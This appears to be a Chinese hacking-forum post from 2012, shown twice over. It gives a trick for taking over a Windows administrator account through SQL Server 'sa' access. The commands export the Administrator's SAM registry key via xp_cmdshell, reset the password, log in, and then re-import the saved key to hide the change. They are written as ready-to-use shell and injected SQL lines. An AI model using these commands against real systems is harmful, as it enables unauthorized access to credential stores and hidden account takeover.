首页
欢迎页
Latest images
搜索
注册
登录**技巧:导出管理员密码文件..........
**技巧:导出管理员密码文件..........
POLARBEAR 周五 八月 03, 2012 7:15 am
sa默认应该可以读sam键。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\old.reg
根本不用克隆.
找到对应的sid.
/*这则经验非常不错,前面我做过一次渗透就没想到可以这样来!*/
默认情况下sa继承system权限,对sam键值有完全控制权限。
SQL代码
exec master..xp_cmdshell "reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg"--
或者
exec master..xp_cmdshell "regedit -eC:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--
都是可行的。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\old.reg
根本不用克隆.
找到对应的sid.
/*这则经验非常不错,前面我做过一次渗透就没想到可以这样来!*/
默认情况下sa继承system权限,对sam键值有完全控制权限。
SQL代码
exec master..xp_cmdshell "reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg"--
或者
exec master..xp_cmdshell "regedit -eC:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--
都是可行的。
POLARBEAR- 帖子数 : 117
注册日期 : 12-07-25
您在这个论坛的权限:
您不能在这个论坛回复主题